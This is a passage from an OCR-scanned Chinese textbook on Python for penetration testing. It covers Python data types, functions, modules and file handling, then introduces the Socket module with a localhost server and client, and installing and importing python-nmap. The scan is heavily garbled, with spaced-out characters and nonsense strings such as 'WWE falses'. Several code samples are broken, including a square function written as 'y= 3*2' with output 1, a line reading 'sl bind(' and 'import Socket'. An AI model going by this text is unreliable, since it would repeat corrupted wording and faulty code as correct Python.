>>> 'Office' not in tools 
True 


(7) 删除 列表 元 素 ，Python 中 使 用 del 语句 来 删除 列表 中 的 元 素 。 例 如 ， 要 删除 列表 中 
的 下 ali'， 可 以 使 用 如 下 的 语句 。 


>>>del tools[11] 
>>>tools 
['Nmap', 'Metasploit'] 


(8) Python 中 还 支持 一 些 操作 的 函数 。 常 用 的 函数 有 如 下 几 个 : index (obj) 在 列表 中 
查找 指定 值 ， 如 果 这 个 值 存在 于 列表 中 ， 就 返回 它 的 下 标 ; append (obj) 在 列表 的 末尾 添加 
指定 对 象 ; insert (index, obj) 将 指定 对 象 插入 到 列表 的 index 位 置 ; remove (obj) 将 列表 中 
的 特定 值 删除 ; sortO 对 列表 中 的 元 素 进行 排序 。 


372 元 组 
元 组 这 个 数据 类 型 和 列表 的 大 部 分 性 质 都 是 相同 的 ， 不 同 之 处 只 有 以 下 两 点 。 
(1 ) 元 组 使 用 的 是 圆 括 号 ()， 而 列表 使 用 的 是 方 括号 []。 
(2 ) 元 组 中 的 元 素 是 不 能 被 修改 的 。 


3.7.3 字典 


字典 数据 类 型 提供 了 更 为 灵活 访问 和 组 织 数据 的 方式 ， 它 可 以 存储 任意 类 型 的 数据 。 字 
典 可 以 使 用 索引 进行 操作 ， 不 过 这 些 索引 的 类 型 并 不 一 定 要 是 整数 ， 也 可 以 是 不 同 的 数据 
类 型 。 字 典 类 型 用 大 括号 表示 ,字典 中 的 索引 称 为 键 ， 这 些 键 和 对 应 的 值 共同 构成 了 一 个 
“ 键 - 值 "， 键 和 值 用 冒号 分 隔 ， 格 式 如 下 所 示 。 

score={'LiMing': 80, 'ChenKe': 100, 'ZhangLan': 75} 

从 上 面 的 例子 可 以 看 出 ， 在 字典 中 顺序 是 并 不 重要 的 。 常 见 的 字典 操作 如 下 。 

(1) keys0， 将 整个 字典 中 的 键 以 列表 形式 返回 。 

(2) values0， 将 整个 字典 中 的 值 以 列表 形式 返回 。 

(3 ) items()， 将 整个 字典 中 的 “ 键 - 值 ”以 列表 形式 返回 。 

(4) has_key()， 检查 一 个 键 是 否 存在 于 字典 中 ， 如 果 存 在 则 返回 true, WWE falses 
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(5 ) get0， 检 查 一 个 键 是 否 存在 于 字典 中 ， 如 果 存 在 则 返回 该 键 对 应 的 值 ， 否 则 返回 备 
用 值 ， 所 以 这 个 函数 需要 两 个 参数 ， 一 个 是 要 查找 的 键 ， 另 一 个 是 备用 值 。 

字典 的 值 还 可 以 是 任意 的 数值 类 型 ， 在 本 书后 面 的 实例 中 会 多 次 使 用 列表 和 字典 作为 字 
典 的 值 。 


3.8 ”图 数 与 模块 


函数 就 是 用 来 完成 一 定 功能 的 ， 向 一 个 函数 提供 输入 ， 这 个 函数 会 返回 一 个 输出 。 有 些 
功能 会 经 常用 到 ， 如 果 反 复 为 这 些 功 能 编写 代码 ， 那 将 会 使 得 程序 变 得 极为 腾 肿 而 且 难 以 阅 
读 。 这 时 就 可 以 使 用 函数 来 改善 程序 ， 函 数 能 提高 应 用 的 模块 性 以 及 代码 的 复 用 率 。 

Python 中 的 函数 可 以 分 成 两 种 : 一 种 是 Python 中 内 置 的 函数 ， 例 如 大 家 都 很 熟悉 的 
print(); 另 一 种 是 自行 编写 的 函数 。 

编写 一 个 函数 很 简单 ，Python 中 的 函数 一 般 包含 以 下 5 个 部 分 。 

(1) 函数 的 标识 符 。 首 先 要 使 用 def 来 创建 一 个 函数 ， 这 个 def 就 是 标识 符 (define 的 
缩写 )。 

(2) 函数 名 。 每 一 个 函数 都 要 有 一 个 名 字 ， 最 好 这 个 函数 的 名 字 能 体现 出 它 的 功能 。 

(3) 函数 的 参数 。 如 果 将 函数 比 作 一 个 机 器 ， 那 么 参数 就 是 放 入 这 个 机 器 的 原料 ， 函 数 
的 参数 需要 放 在 () 中 。 完 成 之 后 需要 使 用 冒号 结束 这 一 行 。 

(4) 函数 体 。 这 部 分 是 函数 的 主体 ， 里面 是 实现 函数 功能 的 代码 。 但 是 函数 体 的 语句 需 
要 相对 函数 标识 符 缩 进 。 

(5) 函数 的 return 语句 。 表 示 函 数 结束 ， 可 以 返回 一 个 值 。 如 果 没 有 return 语句 ， 则 表 
示 返 回 None 

下 面 给 出 了 一 个 计算 平方 的 函数 。 


def square (x): 


y= 3*2 
return y 
如 果 在 命令 行 中 编写 这 个 函数 ， 那 么 在 出 现 冒 号 的 时 候 , Python 命令 行 中 原本 的 “>>>” 
会 变 成 “…”"， 这 时 按 下 Tab 键 执行 缩 进 。 当 函数 内 容 完成 之 后 ， 连 续 按 两 下 回 车 键 ， 就 可 


以 结束 函数 编写 。 这 时 命令 行 中 又 变 成 了 “>>>”， 如 图 3-26 所 示 。 

如 果 需 要 使 用 这 个 函数 ， 只 需要 使 用 这 个 函数 的 名 字 和 参数 即 可 ， 例 如 计算 99 的 平方 ， 
只 需要 输入 “square ( 99 )” 即 可 ， 如 图 3-27 所 示 。 

除了 如 上 定义 的 函数 之 外 ，Python 还 支持 匿名 函数 的 使 用 。 匿 名 函数 使 用 lambda 关键 
字 创 建 。Python 中 Lambda 表达 式 的 形式 如 下 所 示 。 
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函数 名 =lambda 参数 列表 : 函数 体 


eturn y >>> Square(99) 
1 


图 3-26 编写 一 个 函数 图 3-27 调用 一 个 函数 

在 Python 中 ，Lambda 表达 式 适 用 于 简单 的 函数 ， 例 如， 上 例 中 的 square 函数 就 可 以 写 
成 如 下 形式 。 

square = lambda x: x**2 

如 果 将 一 些 经 常 使 用 的 函数 编写 到 一 个 Python 文件 中 , 在 任何 程序 中 都 可 以 调用 这 些 
函数 ， 则 会 更 加 方便 ，C 语言 中 的 头 文件 以 及 Java 中 的 包 就 实现 了 这 样 的 功能 ， 在 Python 
中 ， 这 种 文件 称 为 模块 。 如 果 此 前 有 编程 基础 ， 一 定 对 #nclude <stdio.h> 这 条 语句 感到 很 熟 
悉 。 而 Python 中 使 用 的 是 import 语句 

1. nm po 语句 

如 果 希 望 引入 某 一 个 模块 ， 可 以 使 用 import 加 上 模块 的 名 字 ， 例 如 要 引入 Socket 模块 ， 
就 可 以 使 用 : 

import socket 

如 果 要 同时 引入 多 个 模块 ， 可 以 使 用 逗号 分 开 : 

import socket,random 

这 样 引 用 之 后 ， 在 调用 模块 中 的 函数 时 ， 必 须 使 用 “模块 名 . 函数 名 ”来 引用 。 

2. fiom …in poft 语 名 

一 个 模块 中 可 能 包含 大 量 的 函数 ， 但 是 我 们 的 程序 一 般 不 会 使 用 到 它 的 全 部 函数 。 一 般 
使 用 哪个 函数 ， 只 需要 引入 它 即 可 ， 这 时 就 可 以 使 用 ffom…import 语句 。 例 如 ， 只 需 引 入 
scapy.all 模块 中 的 srp 函数 ， 就 可 以 使 用 如 下 语句 。 

from scapy.all import srp 

通过 这 种 方式 引入 的 时 候 ， 调 用 函数 时 只 需要 给 出 函数 名 ， 不 需要 给 出 模块 名 。 如 果 需 
要 把 一 个 模块 的 所 有 内 容 全 都 导入 ,使 用 的 语句 只 sss 函数 名 写成 * 即 可 。 


from scapy.all import * 


39 文件 处 理 
在 Python 中 对 文件 进行 处 理 的 函数 主要 包括 以 下 几 个 。 
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(1 ) open() 函数 。 如 果 要 对 一 个 文件 进行 处 理 ， 首 先 需 要 打开 这 个 文件 。 使 用 open) Pš 
数 打开 一 个 文件 ， 创 建 一 个 file 对 象 ， 然 后 才 可 以 使 用 其 他 方法 对 这 个 文件 进行 读 写 操作 。 
open 函数 的 完整 语法 格式 如 下 。 

file object = open (file_name [, access _mode][, buffering]) 

这 里 面 的 object 就 是 一 个 file 对象 ，file name 是 要 打开 目标 文件 的 名 称 ，access_ mode 
是 打开 文件 之 后 的 模式 ， 默 认 情 况 下 是 只 读 模 式 r， 也 就 是 不 能 改写 该 文件 。 常 见 的 模式 包 
括 r ( 读 模 式 )、w ( 写 模 式 )、a (追加 模式 )、b (二 进 制 模式 )、+ ( 读 / 写 模式 )。 而 这 些 模式 
还 可 以 组 合 使 用 ， 例 如 ，wb 表示 以 二 进 制 格式 打开 一 个 文件 只 用 于 写 信 ， 如 果 该 文件 已 存 
在 则 将 其 覆盖 ， 如 果 该 文件 不 存在 则 创建 新 文件 。w+ 表示 打开 一 个 文件 用 于 读 写 ， 如 果 该 
文件 已 存在 则 将 其 覆盖 ， 如 果 该 文件 不 存在 则 创建 新 文件 。wb+ 表示 以 二 进 制 格式 打开 一 个 
文件 用 于 读 写 ， 如 果 该 文件 已 存在 则 将 其 覆盖 ， 如 果 该 文件 不 存在 则 创建 新 文件 。 

下 面 打开 一 个 名 为 test.txt 的 文件 ， 并 对 其 进行 读 写 操作 。 

target = open("test.txt", "w+") 

(2) read) 函数 。 打 开 一 个 文件 之 后 ， 就 可 以 使 用 read() 对 其 中 的 内 容 进行 读 取 了 ， 这 
个 函数 的 格式 如 下 所 示 。 

fileobject. read ([count]); 

这 里 面 的 count 表示 要 从 打开 文件 中 读 取 的 字 节 数 。 例 如 : 

str=target.read(100) 

(3) write) 函数 。 打 开 一 个 文件 之 后 ， 还 可 以 使 用 write) 方法 将 任何 字符 串 写 和 一 个 打 
开 的 文件 。write() 函数 的 格式 如 下 所 示 。 

target.write (string); 

例如 ,将 “Hello Python” 写 入 到 test.txt 中 ， 就 可 以 使 用 write) 方法 。 

target .write( " Hello Python Nn"); 

(4) close() 函数 。File 对 象 的 close() 方法 刷新 缓冲 区 里 任何 还 没 写 和 人 的 信息 ， 并 关闭 该 
文件 ， 这 之 后 便 不 能 再 进行 写 人 。 例 如 ， 关 闭 前 面 打 开 的 文件 ， 就 可 以 执行 : 

target.close(); 

除了 以 上 介绍 的 4 个 函数 之 外 ，Python 中 还 提供 了 一 些 高 效 的 文件 处 理 函数 ， 关 于 这 些 
函数 的 使 用 可 以 参考 Python 标准 文档 ， 本 书 不 再 详细 讲述 。 


小 结 


在 本 章 中 首先 完成 对 Python 的 简单 介绍 ， 并 讲解 了 如 何在 Kali Linux 2 系统 上 安装 和 使 
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用 了 Python 编程 环境 。 但 是 Python 的 语法 并 不 是 本 书 的 重点 ， 所 以 只 是 围绕 Python 常见 数据 
类 型 、 基 本 结构 、 常 用 函数 这 几 个 方面 进行 了 介绍 。 如 果 读 者 之 前 没有 编程 语言 的 基础 ， 那 
么 最 好 找 一 本 专门 介绍 Python 基础 的 书 来 学 习 。 

从 第 4 章 开 始 ， 将 会 正式 开始 Python 渗透 之 旅 ，Python 语言 魅力 最 大 的 地 方 就 在 于 丰 
富 的 模块 文件 ， 这 也 正 是 第 4 章 的 内 容 。 


mk 04 | 
安全 渗透 测试 的 常见 模块 


Python 是 一 个 非常 强大 的 网 络 安全 渗透 语言 。 首 先 ，Python 中 内 置 了 很 多 针对 常见 网 络 
协议 的 模块 ， 这 些 模 块 对 网 络 协议 的 层次 进行 了 封装 ， 这 样 在 编写 网 络 安全 渗透 程序 的 时 候 
就 可 以 把 精力 都 放 在 程序 的 逻辑 上 ， 而 不 是 网 络 实现 的 细节 了 。 

通过 这 一 章 的 学 习 ， 读 者 很 快 会 领略 到 Python 的 魅力 ， 以 前 可 能 需要 上 百 行 的 代码 现 
在 可 以 轻 轻松 松 地 使 用 几 行 代码 来 完成 ， 这 一 切 要 归功 于 即将 要 学 习 的 模块 。 在 这 一 章 将 会 
介绍 Python 中 与 网 络 相 关 的 几 个 功能 强大 的 模块 ， 在 很 多 的 著名 黑客 工具 中 也 都 可 以 看 见 这 
些 模块 的 身影 。 

(1) Socket 模块 。 

(2) python-nmap 模块 。 

(3) Scapy 模块 。 


4.1 Socket 模块 文件 


在 长 时 间 的 教学 工作 中 ， 作 者 发 现 学 生 们 经 常会 将 Socket 当 作 TCP/IP 协议 族 中 的 一 员 ， 
但 是 又 无 法 在 TCP/IP 协议 层次 图 中 找到 这 个 “协议 ”"， 因 此 会 感到 困惑 。 

实际 上 TCP/IP 协议 族 将 网 络 分 成 了 链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 。 人 们 所 熟知 的 
IP. TCP 和 HTTP 分 别 位 于 网 络 层 、 传 输 层 和 应 用 层 。 这 些 层次 和 协议 各 司 其 职 ， 各 尽 其 能 。 
而 Socket 并 不 是 TCP/IP 协议 族 中 的 协议 ， 而 是 一 个 编程 接口 。 有 网 络 程序 编写 经 历 的 读者 ， 
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都 知道 在 编程 中 很 少 有 人 会 写实 现 三 次 握手 过 程 的 代码 ， 这 是 为 什么 呢 ? TCP 中 最 为 典型 的 
不 就 是 三 次 握手 吗 ? 

不 错 ，TCP 的 连接 需要 三 次 握手 ， 但 是 这 一 点 在 TCP 的 内 部 已 经 实现 了 ， 当 再 需要 使 
用 TCP 的 时 候 ， 只 需要 调用 这 个 协议 ， 所 以 无 须 再 实现 一 次 。 其 实 TCP/IP 和 操作 系统 一 样 ， 
除了 具体 实现 之 外 ， 同 时 也 对 外 部 提供 调用 的 接口 ， 这 一 点 就 像 Windows 操作 系统 中 提供 了 
Win32 编程 接口 一 样 。 而 Socket 正 是 TCP/IP 提供 的 外 部 接口 。 

那么 也 许 有 人 要 问 ， 为 什么 不 自己 去 编程 实现 这 些 协议 ， 而 是 要 调用 别人 写 好 的 接口 
呢 ? 实际 上 ， 操 作 系统 和 TCP/IP 的 代码 都 很 复杂 ， 实 现 起 来 所 花费 的 时 间 和 精力 将 会 是 惊 
人 的 ,很 可 能 穷尽 一 生 也 无 法 完成 ， 而 如 果 调 用 这 些 接 口 ， 可 能 几 行 代码 就 搞定 了 ， 现 在 读 
者 是 不 是 已 经 了 解 调用 接口 的 含义 了 呢 ? 

也 就 是 说 ，TPC/IP 是 传输 层 协议 ， 主 要 解决 数据 如 何在 网 络 中 传输 ， 而 Socket 则 是 对 
TCP/IP 的 封装 和 应 用 。TPC/IP 是 网 络 中 的 规则 ， 是 不 能 修改 的 ， 而 Socket 则 是 给 程序 员 使 
用 的 ， 是 可 以 任意 使 用 的 。 实 际 上 ， 编 程 语言 在 处 理 网 络 时 都 可 以 使 用 到 Socket. Socket 的 
英文 原 义 是 “ 孔 ” 或 “插座 "， 通 常 也 称 作 “ 套 接 字 ”， 用 于 描述 IP 地 址 和 端口 ， 是 一 个 通信 
链 的 句柄 ， 可 以 用 来 实现 不 同 虚拟 机 或 不 同 计算 机 之 间 的 通信 。 网 络 上 的 两 个 程序 通过 一 个 
双向 的 通信 连接 实现 数据 的 交换 ， 应 用 程序 通常 通过 “ 套 接 字 ”向 网 络 发 出 请 求 或 者 应 答 网 


4.1.1 简介 

Socket 模块 的 主要 目的 是 帮助 在 网 络 上 的 两 个 程序 之 间 建 立信 息 通 道 。 在 Python 中 提 
供 了 两 个 基本 的 Socket 模块 : 服务 端 Socket 和 客户 端 Socket。 当 创建 了 一 个 服务 端 Socket 
之 后 ， 这 个 Socket 就 会 在 本 机 的 一 个 端口 上 等 待 连接 ， 客 户 端 Socket 会 访问 这 个 端口 ， 当 
两 者 完成 连接 之 后 ， 就 可 以 进行 交互 了 。 

在 Python 中 ，Socket 模块 的 使 用 十 分 简单 。 在 使 用 Socket 进行 编程 的 时 候 ， 需 要 首先 
实例 化 一 个 Socket 类 ， 这 个 实例 化 需要 三 个 参数 : 第 一 个 参数 是 地 址 族 ， 第 二 个 参数 是 流 ， 
第 三 个 参数 是 使 用 的 协议 。 

使 用 Socket 建立 服务 端的 思路 主要 是 首先 实例 化 一 个 Socket 类 ， 然 后 开始 循环 监听 ， 
一 直 可 以 接收 来 自 客户 端的 连接 。 成 功 建立 连接 之 后 ， 接 收 客户 端 发 来 的 数据 ， 并 再 向 客户 
端 发 送 数据 ， 传 输 完 毕 之 后 ， 关 闭 这 次 连接 。 

使 用 Socket 建立 客户 端 则 要 简单 得 多 ， 在 实例 化 一 个 Socket 类 之 后 ， 连 接 一 个 远程 的 
地 址 ， 这 个 地 址 由 IP 和 端口 组 成 。 成 功 建立 连接 之 后 ， 开 始 发 送 和 接收 数据 ， 传 输 完 毕 之 
后 ， 关 闭 这 次 连接 。 
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412 ”基本 用 法 


1. Socket 的 实例 化 

首先 来 看 一 下 如 何 实例 化 一 个 Socket。Socket 实例 化 的 格式 为 : 

socket (family, type [,protocal]) 

其 中 ， 三 个 参数 中 的 family 是 要 使 用 的 地 址 族 。 常 用 的 协议 族 有 AF INET、AF_ 
INET6、AF LOCAL (或 称 AF_ UNIX、UNIX 域 Socket)、AF ROUTE 等 。 默 认 值 为 socket. 
AF_INET, 通常 使 用 这 个 默认 值 即 可 。 

第 二 个 参数 type 用 来 指明 Socket 类 型 ， 这 里 可 以 使 用 的 值 有 三 个 : SOCK_STREAM, 
这 是 TCP 类 型 ， 保 证 数据 顺序 及 可 靠 性 ; SOCK_DGRAM， 用 于 UDP 类 型 ， 不 保证 数据 接 
收 的 顺序 ， 非 可 靠 连接 ;SOCK _ RAW， 这 是 原始 类 型 ， 人 允许 对 底层 协议 如 下 或 ICMP 进行 
直接 访问 ， 基 本 不 会 用 到 。 默 认 值 为 SOCK_STREAM。 

第 三 个 参数 指使 用 的 协议 ， 这 个 参数 是 可 选 的 。 通 常 赋值 “0”"， 由 系统 自动 选择 。 

如 果 和 希望 初始 化 一 个 TCP 类 型 的 Socket， 就 可 以 使 用 如 下 语句 。 

s=socket.socket () 

这 条 语句 实际 上 相当 于 socket.socket(socket.AF_INET,socket.SOCK_STREAM)。 这 里 因 
为 使 用 的 都 是 默认 值 ， 所 以 可 以 省 略 掉 。 

而 如 果 和 希望 初始 化 一 个 UDP 类 型 的 Socket， 则 可 以 使 用 如 下 语句 。 


s=socket.socket (socket .AF_INET, socket .SOCK_DGRAM) 


2. Socket% F hI Až 

当成 功 初 始 化 一 个 Socket 之 后 ， 就 可 以 使 用 Socket 类 所 提供 的 函数 。Socket 类 中 主要 
提供 如 下 所 示 常 用 的 函数 。 

bind(): 这 个 函数 由 服务 端 Socket 调用 ， 会 将 之 前 创建 Socket 与 指定 的 IP 地 址 和 端口 进 
行 绑 定 。 如 果 之 前 使 用 了 AF_INET 初始 化 Socket， 那 么 这 里 可 以 使 用 元 组 (host, port) 的 
形式 表示 地 址 。 

例如 ， 要 将 刚才 创建 的 Socket 套 接 字 绑 定 到 本 机 的 2345 端口 ， 就 可 以 使 用 如 下 语句 。 

s.bind(('127.0.0.1',2345)) 

listen() : 这 个 函数 用 于 在 使 用 TCP 的 服务 端 开 启 监听 模式 。 这 个 函数 可 以 使 用 一 个 参数 
来 指定 可 以 挂 起 的 最 大 连接 数量 。 这 个 参数 的 值 最 小 为 1， 一 般 设置 为 5。 

例如 ， 要 在 服务 端 开启 一 个 监听 ， 可 以 使 用 如 下 语句 。 

s.listen(5) 


accept() : 这 个 函数 用 于 在 使 用 TCP 的 服务 端 接 收 连 接 ， 一 般 是 阻塞 态 。 接 受 TCP 连接 
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并 返回 (conn, address), HiP, conn 是 新 的 套 接 字 对 象 ， 可 以 用 来 接收 和 发 送 数据 ; address 
是 连接 客户 端的 地 址 。 

上 面 三 个 函数 是 用 于 服务 端的 Socket 函数 ， 下 面 来 看 看 客户 端的 函数 。 

connect() : 这 个 函数 用 于 在 使 用 TCP 的 客户 端 去 连接 服务 端 时 使 用 ， 使 用 的 参数 是 一 个 
元 组 ， 形 式 为 (hostmame，port)。 

例如 ， 在 客户 端 程序 初始 化 了 一 个 Socket 之 后 ， 就 可 以 使 用 这 个 函数 去 连接 到 服务 端 。 
例如 ， 现 在 要 连接 本 机 的 2345 端口 ， 可 以 使 用 如 下 语句 。 

s.connect (("127.0.0.1",2345)) 

接 下 来 介绍 一 些 在 服务 端 和 客户 端 都 可 以 使 用 的 函数 。 

send() : 这 个 函数 用 于 在 使 用 TCP 时 发 送 数据 ， 完 整 的 形式 为 send(string[,flag])， 利 用 
这 个 函数 可 以 将 string 代表 的 数据 发 送 到 已 经 连接 的 Socket， 返 回 值 是 发 送 字 节 的 数量 。 但 
是 可 能 未 将 指定 的 内 容 全 部 发 送 。 

sendall() : 这 个 函数 与 send() 相 类 似 ， 也 是 用 于 在 使 用 TCP 时 发 送 数据 ， 完 整 的 形式 为 
sendall(string[,flag])。 与 send() 的 区 别 是 完整 发 送 TCP 数据 。 将 string 中 的 数据 发 送 到 连接 
的 套 接 字 ， 但 在 返回 之 前 会 尝试 发 送 所 有 数据 。 成 功 返 回 None， 失 败 则 抛 出 异常 。 

例如 ， 使 用 这 个 函数 发 送 一 段 字符 到 Socket， 可 以 使 用 如 下 语句 。 

s.sendall(bytes("Hello, My Friend! ",encoding="utf-8")) 

recv() : 这 个 函数 用 于 在 使 用 TCP 时 接收 数据 ， 完 整 的 形式 为 recv(bufsize[,flag])， 接 收 
Socket 的 数据 。 数 据 以 字符 串 形 式 返 回 ，bufsize 指定 最 多 可 以 接收 的 数量 ，flag 这 个 参数 一 
般 不 会 使 用 。 

例如 ， 通 过 这 个 函数 接收 一 段 长 度 为 1024 的 字符 Socket， 可 以 使 用 如 下 语句 。 

obj .recv (1024) 

sendto() : 这 个 函数 用 于 在 使 用 UDP 时 发 送 数据 ， 完 整 的 形式 为 sendto(string[,flag],address)， 
返回 值 是 发 送 的 字 节 数 。address 是 形式 为 (ipaddr，port) 的 元 组 ， 指 定 远程 地 址 。 

recvfrom() : UDP 专用 ， 接 收 数据 ， 返 回 数据 远 端的 中 地址 和 端口 ,但 返回 值 是 
(data,address)。 其 中 ，data 是 包含 接收 数据 的 字符 串 ，address 是 发 送 数据 的 套 接 字 地 址 。 
close(): 关闭 socket。 


3. 使 用 Sock 比 编写 一 个 简单 的 服务 端 和 客户 端 

接 下 来 编写 两 个 可 以 互相 通信 的 服务 端 和 客户 端 程序 。 首 先 使 用 Socket 编写 一 个 服务 端 
程序 ， 这 里 会 用 到 之 前 介绍 过 的 函数 。Socket 套 接 字 开 始 监听 后 ， 就 会 使 用 accept 函数 来 等 
待 客户 端的 连接 。 这 个 过 程 使 用 一 个 条 件 永远 为 真 的 循环 来 实现 ， 服 务 端 在 处 理 完 和 客户 端 
的 连接 后 ， 会 再 次 调用 这 个 函数 ， 等 待 下 一 个 连接 。 
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import socket 
sl = socket.socket () 
sl bind(("127.0.0.1",2385)) 
sl.listen(5) 
while 1: 
conn,address = sl.accept () 
print "a new connect from", address 
conn.sendall("Hello world") 
conn.close () 


可 以 将 这 段 程序 保存 为 serverpy， 在 编辑 器 中 执行 。 但 是 这 个 程序 很 简单 ， 也 可 以 
直接 在 Python 的 命令 行 中 执行 ， 首 先 启 动 一 个 终端 ， 然 后 输入 “python”。 在 Python 窗口 中 
启动 如 下 程序 ， 需 要 注意 的 是 ，while 循环 中 的 语句 在 输入 时 要 先 使 用 Tab 键 ， 循 环 结束 的 
时 候 ， 需 要 按 两 下 回 车 键 ， 如 图 4-1 所 示 


root@kali: ~ ooo 


Fie Edt View Search Terminal Help 


or more information 


图 4-1 使 用 Python 编写 的 服务 端 


接 下 来 再 使 用 Socket 来 编写 一 个 客户 端 程序 ， 这 个 程序 最 重要 的 是 使 用 connect() 函数 
来 连接 到 目标 服务 端 


import Socket 

s2 = socket.socket () 
s2.connect (("127.0.0.1",2345)) 
data = s2.recv(1024) 
s2.close () 

print 'Received', repr (data) 


同样 可 以 将 这 段 程序 保存 为 client.py。 但 是 这 里 也 直接 在 Python 的 命令 行 中 执行 ， 首 先 
再 打开 一 个 终端 ， 然 后 输入 “python”。 在 Python 窗口 中 按 如 图 4-2 所 示 输 入 程序 。 


root@kali: ~ ae 


Fie Edt View Search Terminal Help 


e" for more information. 


图 4-2 使 用 Python 编写 的 客户 端 
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执行 之 后 ， 在 服务 器 端的 程序 可 以 看 到 一 个 来 自 本 机 45412 (这 个 数字 代表 客户 端 使 用 
的 端口 ， 每 次 都 不 相同 ) 的 连接 。 这 表明 客户 端 已 经 成 功 地 与 服务 端 建立 了 连接 ， 如 图 4-3 
所 示 。 


图 4-3 客户 端 已 经 与 服务 端 成 功 建立 了 连接 


Socket 可 以 算是 使 用 频率 最 高 的 网 络 模块 文件 了 ， 关 于 这 个 模块 的 应 用 ， 后 面 会 详细 
介绍 。 


4.2 python-nmap 模块 文件 


如 果 读 者 刚刚 开始 接触 网 络 编程 ， 一 定 觉得 网 络 扫描 是 一 件 神奇 的 事情 。 你 是 不 是 也 会 
希望 “ Wanwa E pa 目标 主机 的 操作 系统 类 型 、 开 放 的 端口 甚至 安装 的 软件 呢 ? 
但 是 这 一 切 如 果 要 从 零 做 起 ， 是 一 件 相当 复杂 的 事情 ， 读 者 可 以 参考 一 下 网 络 上 那些 使 用 C 
语言 编 5 aqapana s s abu 工程 

不 过 ， 如 果 只 是 需要 得 到 扫描 的 结果 ， 则 无 须 如 此 大 费 周 章 。 现 在 只 需要 一 个 完善 的 工 
具 ， 而 这 个 工具 可 以 完成 所 有 的 扫描 工作 ， 所 要 做 的 只 是 在 程序 中 对 这 个 工具 进行 简单 的 调 
用 即 可 完成 任务 。 那 么 哪 一 款 工具 既 具 备 网 络 扫描 的 强大 功能 ， 又 可 以 很 完美 地 和 Python 程 

序 结合 在 一 起 呢 ? 

Nmap 这 款 工具 在 黑客 历史 上 可 以 说 是 一 个 传奇 ， 它 在 网 络 扫描 方面 强大 的 功能 令 人 惊 
I, Nmap 是 世界 渗透 测试 行业 公认 最 优秀 的 网 络 安 全 审计 工具 ， 它 可 以 通过 对 设备 的 探测 
来 审计 它 的 安全 性 ， 而 且 功 能 极为 完备 ， 单 是 对 端口 状态 的 扫描 技术 就 有 数 十 种 。Nmap 的 
强大 功能 是 毋庸 置疑 的 ， 它 几乎 是 目前 的 黑客 必 备 工具 ， 读 者 几乎 可 以 在 任何 经 典 的 网 络 安 
全 图 书 中 找到 它 的 名 字 ， 甚 至 可 以 在 大 量 的 影视 作品 (例如 《黑客 帝国 兴 极 乐 空间 兴 恋 影 重 
重 兴 虎 胆 龙 威 4》 等 ) 中 看 到 Nmap 的 身影 。 

目前 Nmap 已 经 具备 如 下 的 各 种 功能 。 

(1) 主机 发 现 功能 。 向 目标 计算 机 发 送信 息 ， 然 后 根据 目标 的 反应 来 确定 它 是 否 处 于 开 
机 并 联网 的 状态 。 

(2 ) 端口 扫描 。 向 目标 计算 机 的 指定 端口 发 送信 息 ， 然 后 根据 目标 端口 的 反应 来 判断 它 
是 否 开放 。 
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(3) 服务 及 版 本 检测 。 向 目标 计算 机 的 目标 端口 发 送 特制 的 信息 ， 然 后 根据 目标 的 反应 
来 检测 它 运 行 服 务 的 服务 类 型 和 版 本 。 

(4) 操作 系统 检测 。 

除了 这 些 基 本 功能 之 外 ，Nmap 还 实现 一 些 高 级 的 审计 技术 ， 例 如 ， 伪 造 发 起 扫描 端的 
身份 ， 进 行 隐蔽 的 扫描 ， 规避 目标 的 防御 设备 (例如 防火 墙 )， 对 系统 进行 安全 漏洞 检测 ， 并 
提供 完善 的 报告 选项 。 在 后 来 的 不 断 发 展 中 ， 随 着 Nmap 强大 的 脚本 引擎 NSE 的 推出 ,任何 
人 都 可 以 自己 向 Nmap 中 添加 新 的 功能 模块 
于 Nmap 提供 了 如 此 强大 而 又 全 面 的 功能 ， 所 以 如 果 能 在 自己 编写 的 Python 程序 中 使 
用 这 些 功能 将 会 事半功倍 。 有 了 Nmap ， 我 们 就 像 是 “站 在 巨人 的 肩膀 上 ”编程 


4.2.1 简介 

python-nmap 是 一 个 可 以 帮助 使 用 Nmap 功能 的 Python 模块 文件 。 在 python-nmap 模块 
的 帮助 下 ， 可 以 轻松 地 在 自己 的 程序 中 使 用 Nmap 扫描 的 结果 ， 也 可 以 编写 程序 自动 化 地 完 
成 扫描 任务 

现在 python-nmap 最 新 的 版 本 为 0.61， 这 个 模块 的 作者 的 个 人 网 站 为 http://xael.org/。 如 
果 希 望 在 Python 中 正常 使 用 python-nmap 模块 ， 必 须 先 在 系统 中 安装 Nmap。 因 为 在 这 个 模 
块 文件 中 会 调用 Nmap 的 一 些 功 能 。 现 在 使 用 的 Kali Linux 2 中 已 经 安装 好 了 Nmap, WREE 
者 使 用 的 是 其 他 系统 的 ， 可 以 先 安装 Nmap。Windows 操作 系统 下 直接 下 载 安 装 即 可 ，Linux 
操作 系统 中 则 需要 使 用 如 下 命令 


sudo apt-get install nmap 


然后 安装 python-nmap， 如 图 4-4 所 示 


sudo pip install python-nmap 


root@kali: ~ ° ee 
File Edit View Search Terminal Help 
:~# sudo pip install python-nmap 
Collecting python-nm 
Download p = z (41kB) 
100% Waaa se 52kB/s 
Building -= hon-nmap 
y 5 for python-nmap . done 
/ .cache/pip/wheels/d2/20/17/8eb9401fb0fa5ffbd0394c44 


p 
: python-nmap 
alled python-nmap-0.6.1 


图 4-4 安装 python-nmap 模块 文件 
安装 成 功 之 后 ， 打 开 一 个 终端 ， 启 动 Python， 然 后 导入 Nmap ， 如 图 4-5 所 示 。 
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root@kali: ~ °ee 
File Edit View Search Terminal Help 
“EI 


t, Jan 19 2017, 14:48:08) 
on Linux: 
copyright", "credits" or "license" for more information 


nmap 


图 4-5 导入 python-nmap 模块 


从 图 4-5 中 可 以 看 出 已 经 成 功 导 入 Nmap 模块 ， 现 在 可 以 正常 使 用 


4.2.2 ”基本 用 法 


python-nmap 模 块 的 核心 就 是 PortScanner、PortScannerAsync、PortScannerError、 
PortScannerHostDict、PortScannerYield 等 5 个 类 ， 其 中 最 为 重要 的 是 PortScanner 类 

1. python- nm ap 模块 类 的 实例 化 

最 常 使 用 的 是 PortScanner 类 ， 这 个 类 实现 Nmap 工具 功能 的 封装 。 对 这 个 类 进行 实例 
化 很 简单 ， 只 需要 如 下 语句 即 可 实现 

nmap .PortScanner () 


执行 的 结果 如 图 4-6 所 示 


mport nmap 
m=nmap.PortScanner() 


图 4-6 使 用 PortScanner0 实例 化 
了 PortScannerAsync 类 和 PortScanner 类 的 功能 相似 ,但 是 这 个 类 可 以 实现 异步 扫描 ， 对 这 
个 类 的 实例 化 语句 如 下 
